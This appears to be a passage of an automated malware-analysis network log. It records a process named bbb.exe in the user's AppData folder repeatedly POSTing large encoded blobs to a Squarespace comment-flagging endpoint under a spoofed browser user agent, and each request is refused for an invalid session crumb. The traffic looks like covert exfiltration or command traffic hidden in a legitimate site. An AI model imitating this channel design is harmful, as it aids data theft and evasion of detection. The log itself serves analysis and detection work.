2024-09-01 19:56:47 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:47 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BVosaf9F9zVcYjY2YjQ2MTMwZDZjZDFlOGUwMzRjYmM3NTQzODhl; Path=/; Secure Set-Cookie: crumb=Betx91poCrzCMzIwNDgwMGNhNDU2ZjQ1MWI1ZGUxZjUyYzI2ODQ4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: vOrXO0UU/WzlbO6IO Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Betx91poCrzCMzIwNDgwMGNhNDU2ZjQ1MWI1ZGUxZjUyYzI2ODQ4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49844	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:47 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108350 Expect: 100-continue
2024-09-01 19:56:47 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:47 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:47 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 7a 4b 45 76 59 34 55 6a 71 55 76 6e 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YzKEvY4UjqUvnbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:47 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:56:47 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:56:47 UTC	1	OUT	Data Raw: 6c Data Ascii: l
2024-09-01 19:56:47 UTC	16306	OUT	Data Raw: 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c 56 31 Data Ascii: abaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9clV1
2024-09-01 19:56:47 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
2024-09-01 19:56:47 UTC	16306	OUT	Data Raw: 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 7a 37 Data Ascii: PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwgz7
2024-09-01 19:56:47 UTC	1	OUT	Data Raw: 64 Data Ascii: d
2024-09-01 19:56:47 UTC	16306	OUT	Data Raw: 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 67 51 Data Ascii: UPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7ChgQ
2024-09-01 19:56:47 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:47 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BdNk8aa-LrmTM2Q4MGViNjBhNDNiZTRjYzE4NDhmNjU1NDI5Yzg2; Path=/; Secure Set-Cookie: crumb=BUF0EY_Asv2vZjkzN2IxZDcyY2UzMTBmODFlYTgzNDg4N2Q5Nzc1; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: BnCWa4Wa/FqDszfIM Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BUF0EY_Asv2vZjkzN2IxZDcyY2UzMTBmODFlYTgzNDg4N2Q5Nzc1"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	49845	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:48 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:48 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:48 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:48 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:48 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSnIqkXw4NC2Yzk4MWQ3YmZjMDg1Zjc4MTkwNDRlNzg3YTcwNzA5; Path=/; Secure Set-Cookie: crumb=BYD6E4Xb2kJ-ZmYwNTMwYTZkZTI5Zjg0YTM5NzBmZDE1YjVmNzJj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 8C81R6YB/HjNNZnEX Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYD6E4Xb2kJ-ZmYwNTMwYTZkZTI5Zjg0YTM5NzBmZDE1YjVmNzJj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49846	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:48 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108350 Expect: 100-continue
2024-09-01 19:56:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:48 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:48 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 79 73 4a 65 66 51 58 4f 51 30 50 33 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YysJefQXOQ0P3bbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:48 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:56:48 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:56:48 UTC	1	OUT	Data Raw: 6c Data Ascii: l
2024-09-01 19:56:48 UTC	16306	OUT	Data Raw: 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c 56 31 Data Ascii: abaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9clV1
2024-09-01 19:56:48 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
2024-09-01 19:56:48 UTC	16306	OUT	Data Raw: 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 7a 37 Data Ascii: PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwgz7
2024-09-01 19:56:48 UTC	1	OUT	Data Raw: 64 Data Ascii: d
2024-09-01 19:56:48 UTC	16306	OUT	Data Raw: 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 67 51 Data Ascii: UPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7ChgQ
2024-09-01 19:56:48 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:48 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BRqZIKMTbEPeMTc2OWZjMmNiMDM3Y2RlMWIyOTk1NDhjNjA0NGQw; Path=/; Secure Set-Cookie: crumb=BboF2GH63rljMzVlNGI1ZDM5MzU1YzAzMGQ0NTgzOTlmNDJjNmRi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: B2l4bc61/LXgaBsdW Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BboF2GH63rljMzVlNGI1ZDM5MzU1YzAzMGQ0NTgzOTlmNDJjNmRi"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49847	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:49 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:49 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:49 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:49 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:49 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:49 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bf922v5hq7jEMjUwYWU0NDM4ZWY2Mzk0MGRiMjg2YzkwMjEyYTJi; Path=/; Secure Set-Cookie: crumb=BfsMS6Ixu56MZjNlYjYzYjA3MDcyNjc3ZTExNzZmYzZjODFiNmY2; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: nd19EPSl/8kR69wv4 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BfsMS6Ixu56MZjNlYjYzYjA3MDcyNjc3ZTExNzZmYzZjODFiNmY2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	49848	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:49 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108350 Expect: 100-continue
2024-09-01 19:56:49 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:49 UTC	1	OUT	Data Raw: 70 Data Ascii: p
